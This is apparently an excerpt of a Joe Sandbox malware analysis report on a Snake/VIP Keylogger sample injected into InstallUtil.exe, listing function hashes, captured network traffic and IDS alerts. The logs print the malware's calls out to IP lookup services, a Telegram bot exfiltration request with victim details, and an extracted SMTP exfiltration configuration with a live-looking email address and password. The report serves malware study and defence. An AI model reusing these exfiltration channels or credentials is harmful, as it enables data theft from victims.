Instruction ID: 4526a72bb3e64dca37f851d5d5f9016522fdb6a605d468e264ac3a5b106ca19b
Opcode Fuzzy Hash: afe0b997feb88c80dbac709cf39d9565188918fc1184e52653ebfce785a704e7
Instruction Fuzzy Hash: B1215BB0D002099FDB05EFA4D950B9EBFF1FB46300F00C5A9D154AB265EB744A468F81

Function 00F827F0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f16fd38f42e5288d4316023e4e62f57721b851e25b5dbe9e0bfddb81eca3613
Instruction ID: e9c5151683d37751cd4c466014e6cfb0846396824974832bc2cc15702db2b986
Opcode Fuzzy Hash: 4f16fd38f42e5288d4316023e4e62f57721b851e25b5dbe9e0bfddb81eca3613
Instruction Fuzzy Hash: 3421E0B4C082098FCB40EFA9D9495EEBBF4BB09300F10516AD815F3220EB306A85DBA1

Function 00AFD19B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2542959788.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_afd000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
Instruction ID: 8279d8d64a8ccfb141e778a190b1c26a9e5dc2750e4433cc3a44514ffad667bf
Opcode Fuzzy Hash: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
Instruction Fuzzy Hash: 4511B1B6504244CFCB16CF54D9C4B66BF72FB98314F24C5A9E9090B256C33AD856CBA1

Function 00F85E98 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d7ae88048d7de644dc9b35cdd8008bfea68ab95bffe0a1608a6a556032ee18d
Instruction ID: 14ddf3e00a5bf4beddde754a27160b1d57378ab39fe45e4b526ec9e274a65485
Opcode Fuzzy Hash: 5d7ae88048d7de644dc9b35cdd8008bfea68ab95bffe0a1608a6a556032ee18d
Instruction Fuzzy Hash: B8014932A046085FCB119FA49C02EFE3FA6DBC9750F14402AF901C7281DE758E12B791

Function 05628338 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2551935406.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5620000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b0760185613a9cb52951bc0893354de36feacd3dcaa6538ab2dd67e730d4d9c
Instruction ID: 362674e6a87f6f360ff5bc8eebf4bbe8cbe84b10a16a3adcea9327a32f3e792c
Opcode Fuzzy Hash: 5b0760185613a9cb52951bc0893354de36feacd3dcaa6538ab2dd67e730d4d9c
Instruction Fuzzy Hash: D21167B2800349DFDB10CF99C845BDEBBF4EB48320F108419E918A7610C779A951CFA5

Function 05628A99 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2551935406.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5620000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43480ad99f5c1905cc3e1098ab11a27b2b9e71a79e1364f527d87c0ed3050a4a
Instruction ID: ea75e530948c60445728316c6c2b319177b10033e9c4b24f86e053bc525bd0dd
Opcode Fuzzy Hash: 43480ad99f5c1905cc3e1098ab11a27b2b9e71a79e1364f527d87c0ed3050a4a
Instruction Fuzzy Hash: 1E2156B28002499FDB11CF99C845BEEBFF4EF48320F148429E958A7211C33AA556DFA0

Function 00F8F320 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9cabf9acf12c2ea829aec69fd010d4a02837f9fb18bd96175f68a402336a49b
Instruction ID: 324e0019d02bb71aa007fa9913d5fe28da0c00ef5ffbcef11687930ff00bf090
Opcode Fuzzy Hash: d9cabf9acf12c2ea829aec69fd010d4a02837f9fb18bd96175f68a402336a49b
Instruction Fuzzy Hash: CA114FB0E00209DFDB04EFA4D941B9EBBF5FB85300F10C5A9D154A7255EB749A468F81

Function 05627FD9 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2551935406.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5620000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f37ff133ceff1ba4ba8b2de7f02769c5da57494e5e643dd4c61b213e7ef208f
Instruction ID: fec93f4c09059af21161460d9225c7f39a7c1c5f55c09c683b44e7baaa63241f
Opcode Fuzzy Hash: 9f37ff133ceff1ba4ba8b2de7f02769c5da57494e5e643dd4c61b213e7ef208f
Instruction Fuzzy Hash: 8D11FA79E446588FDB04DFB8D950BAEBBF1EF49311F418061E909A7385EA309A42CF51

Function 00B0D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2543071090.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b0d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
Instruction ID: 6de063f521a27b5c7a9c28e698049c15abcab6fe7a0e6cd9afc6df3f12d48de1
Opcode Fuzzy Hash: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
Instruction Fuzzy Hash: F0119D75504284DFCB15CF50D9D4B15BFA2FB84314F24C6ADD8494B6A6C33AD84ACF62

Function 00F8E8E8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c66901dd2eb6530578266e6e256b1d07f3ef1aa43a7469e4c7bac75cff03c0a
Instruction ID: 3788beb96b6b2ce95bf8bccd2e5862c8099ca1cbb387e9468717e28781fd003e
Opcode Fuzzy Hash: 1c66901dd2eb6530578266e6e256b1d07f3ef1aa43a7469e4c7bac75cff03c0a
Instruction Fuzzy Hash: 6B114078D05209EFCF41DFA4D8446EEBBB1FB49300F404166D910A3355D7345A16DF91

Function 00F8ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23aa51944a6e3db80bf54ebd6bc672d996d3f295d913efc5e1fd6920235abb4
Instruction ID: 31aa8ab63925b16e298427b2eaf566f8c47f5acd80cd233a2fff193aac0aa80b
Opcode Fuzzy Hash: a23aa51944a6e3db80bf54ebd6bc672d996d3f295d913efc5e1fd6920235abb4
Instruction Fuzzy Hash: A3F0F6317006144BA7157A3E9858E6AB6DEEFC9B71315407BE905C7361EE21CC02D781

Function 00F89D59 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d120c55772e788be0f3056fe26eb0f35a43ddad95f796c742b9890b789ad3a0
Instruction ID: db97d73c0a25ef0b21a17588a7a1ce78f71bde122f722b65dea4fdf8c85a2c31
Opcode Fuzzy Hash: 9d120c55772e788be0f3056fe26eb0f35a43ddad95f796c742b9890b789ad3a0
Instruction Fuzzy Hash: 32F06D353042187FDB182BA59C54ABB77DBEBCC3A0B144425BA4AC7351EEB5CD0197A0

Function 00F89C23 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd0a61c0d299c4922dbe973e0ffb0fb7810bbc21e68a7d98449bcbfea35dc8b0
Instruction ID: a9024b1d33fd10d3b654b553a0f2be8a8b56b72f3dd4be719d5123d02801e813
Opcode Fuzzy Hash: fd0a61c0d299c4922dbe973e0ffb0fb7810bbc21e68a7d98449bcbfea35dc8b0
Instruction Fuzzy Hash: D3F0F6329081589FCB029B689C04AEABFF1EF8A330F14816AE458C7261C2714915DB51

Function 00F828A3 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23e5a0b23888865b030c9495a85a178ce48ffc397af94dadb0b70ac93b9052c1
Instruction ID: 947a01d725db8fadd4b6339ef4646c574360675b2f230b9685a70168596816a5
Opcode Fuzzy Hash: 23e5a0b23888865b030c9495a85a178ce48ffc397af94dadb0b70ac93b9052c1
Instruction Fuzzy Hash: BAE0DF31DA43A6CACB02A7B49C100EEBF34AD86321B48859BC060370A1EB302619C7A1

Function 00F86739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 781b2dc2b48d12a4a4dfde7eacc8de6f53dbadf5df4dda0225cdefa903b5b702
Instruction ID: 16f3c1d8468bbe304794662f911c7ec002493e7b9a165b49e773d0cb93c70460
Opcode Fuzzy Hash: 781b2dc2b48d12a4a4dfde7eacc8de6f53dbadf5df4dda0225cdefa903b5b702
Instruction Fuzzy Hash: 56E0C2354493854FCF07FB30ED5989C3F369991204B449696E0868B86BEEA849478F51

Function 00F828B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde00685354b22069ef5d03a237bc52edeb231587c1ace0741c3a3cea0700062
Instruction ID: fe27369d7b8262936b771fb611b032e460adf0ab99204cf3f54e820d5babc0e3
Opcode Fuzzy Hash: dde00685354b22069ef5d03a237bc52edeb231587c1ace0741c3a3cea0700062
Instruction Fuzzy Hash: BAD01231D6022A978B01ABA5DC044DEBB38FE95361B504666D51437140EB70265986E1

Function 00F88EF8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 7a36df40e860e842d648383e8f55a886dfcc1bb2960f74d43052c8f047899ad1
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 58C08C3360C1282AA235204E7C40EE3BB8DC3C13F4AA10137FB2CD3200AC42AC8222F8

Function 00F8AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4b5f3e2ee75e262880bb2cbc2b4228e99a2e28e6c7ebb714e6bb3f349cea3d
Instruction ID: 52bdbabca98fb152b2017a5c07924aaf394bf3aabbd39d96a6c44219cfd139e0
Opcode Fuzzy Hash: db4b5f3e2ee75e262880bb2cbc2b4228e99a2e28e6c7ebb714e6bb3f349cea3d
Instruction Fuzzy Hash: BAD0677AB000089FDB049F98EC41DDDF776FB98221B448127E915A3260C6319965DB54

Function 00F86748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60bd846b70c126fcd995c60313b19ff16d2fe2af046f6b17fa5accb7e46556f0
Instruction ID: 944439ea1a46c4c95e348c8ca45114c450213b947f2dcc5378ed75e1f57739fd
Opcode Fuzzy Hash: 60bd846b70c126fcd995c60313b19ff16d2fe2af046f6b17fa5accb7e46556f0
Instruction Fuzzy Hash: C8C0123105030C4BDA4AFF61ED46E15333EA6C0504B80D610A1490A56EFFB89A864B95

Non-executed Functions

Function 00F8FA88 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a59c80d9ae4164112f697bd4aa0dff037f2c203082aa67ef074e033284764fde
Instruction ID: 5b793f6ee767a41d9491c75aec11043939462fba09c49167b02440a11c6e6dd1
Opcode Fuzzy Hash: a59c80d9ae4164112f697bd4aa0dff037f2c203082aa67ef074e033284764fde
Instruction Fuzzy Hash: 13C19F74E10218CFDB14DFA5C994B9DBBB2BF89300F6081A9D409AB3A5DB359E85CF50

Function 00F8F631 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3b762d301309c50498a331fed32373b5e29461d28eccaa4e391c4a056f9ef0
Instruction ID: 761f8493fe7f87026058f58cfe9eea34e4bf43a828bb913090a5131866182c43
Opcode Fuzzy Hash: 6b3b762d301309c50498a331fed32373b5e29461d28eccaa4e391c4a056f9ef0
Instruction Fuzzy Hash: 6EC1AF74E00218CFEB18DFA5C944B9DBBB2BF89300F2481A9D409AB3A5DB355E85DF50

Function 0562C108 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2551935406.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5620000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32dde9003afacaa0f52e0d397f58eb17f0ec197713deae787eb643764a44e648
Instruction ID: 39ccd1162c3212145059d7e51a5fdb31597636246ce3091287bb3c71a671a3e4
Opcode Fuzzy Hash: 32dde9003afacaa0f52e0d397f58eb17f0ec197713deae787eb643764a44e648
Instruction Fuzzy Hash: 56D19E78E00218CFEB14DFA5D954B9DBBB2BF89300F2081A9D409AB365EB355D82CF15

Function 05620D48 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2551935406.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5620000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0ec1bfc2aa05894f0f357026c43c69450ffcb754d7f5a8b148c69b52986c492
Instruction ID: 8ba1ecdaff6139362a769bfd6233c4275bf17ad7758000095492c7298fcd260e
Opcode Fuzzy Hash: c0ec1bfc2aa05894f0f357026c43c69450ffcb754d7f5a8b148c69b52986c492
Instruction Fuzzy Hash: AEC19F74E00218CFDB14DFA5C984B9DBBB2BF89300F6081A9D409AB3A5DB355E81CF50

Function 056215F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2551935406.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5620000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff7ccf2ae2249c489f13c8345a785fe2ddc56009d99f9536ca5e68bc51436d0d
Instruction ID: 17496810df3054bd074f000c844fa3190ea0c2f8b43fea979307a3833242c5a4
Opcode Fuzzy Hash: ff7ccf2ae2249c489f13c8345a785fe2ddc56009d99f9536ca5e68bc51436d0d
Instruction Fuzzy Hash: 93C19F74E00218CFDB54DFA5C994BADBBB2BF89300F2081A9D409AB3A5DB355E85CF50

Function 056265C0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2551935406.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5620000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59aa8925fae4847fd3d981b3e5a3c9e7d170356bc083f04cfa4c5e9e1045a44e
Instruction ID: 4baa4c18fa858f642ce5dddad8eeb5a29d4f22ef0c7e127778e0d7ba10cf9e86
Opcode Fuzzy Hash: 59aa8925fae4847fd3d981b3e5a3c9e7d170356bc083f04cfa4c5e9e1045a44e
Instruction Fuzzy Hash: 4FC19E74E00218CFDB14DFA5C984B9DBBB2BF89300F2081A9D409AB3A5DB359E85CF50

Function 056241C8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2551935406.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5620000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef6b7e8e789e0526db1dd501d2d5a5b4cde0a52e6986baa273b75df89b19162a
Instruction ID: 12eab3522c24c93eb94ab9ae9c0d54ca2449d51f8d4e05b05ab9b918c8175639
Opcode Fuzzy Hash: ef6b7e8e789e0526db1dd501d2d5a5b4cde0a52e6986baa273b75df89b19162a
Instruction Fuzzy Hash: A1C19F74E00218CFDB14DFA5C984B9DBBB2BF89300F6481A9D409AB3A5DB359A81CF50

Function 00F82A69 Relevance: 5.1, Strings: 4, Instructions: 96COMMON

Download Yara Rule

Strings

Xq, xrefs: 00F82BA4
Xq, xrefs: 00F82B57
Xq, xrefs: 00F82A9E
Xq, xrefs: 00F82AD8

Memory Dump Source

Source File: 00000004.00000002.2544272662.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f80000_InstallUtil.jbxd

Similarity

API ID:
String ID: Xq$Xq$Xq$Xq
API String ID: 0-3965792415
Opcode ID: 86101ab836d986bcf8367a1b9abe8d1eabb6449389549c8726d5001d26a5649c
Instruction ID: 895fb406c1ff0a9f3db7a5cf9c6dced8a3725dc984acc93b5d7c8268a90ed6e4
Opcode Fuzzy Hash: 86101ab836d986bcf8367a1b9abe8d1eabb6449389549c8726d5001d26a5649c
Instruction Fuzzy Hash: 1A318F71D012298BDFA5EBA888417EFB7B2BF94310F144079C405A7351EB74DE85EB92

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2011/01/2025%20/%2010:40:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49980 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49983 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49996 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49986 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49990 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49992 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49982 -> 104.21.112.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 00F8F8E9h	4_2_00F8F631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 00F8FD41h	4_2_00F8FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05628E28h	4_2_05628B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05627A5Dh	4_2_05627720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05620FF1h	4_2_05620D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0562C3D6h	4_2_0562C108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 056218A1h	4_2_056215F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05626869h	4_2_056265C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05624471h	4_2_056241C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 05621449h	4_2_056211A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0562E856h	4_2_0562E588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0562C866h	4_2_0562C598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0562DF36h	4_2_0562DC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0562BF46h	4_2_0562BC78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 056202E9h	4_2_05620040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 056262DBh	4_2_05626030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov esp, ebp	4_2_0562AC31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 056232B1h	4_2_05623008
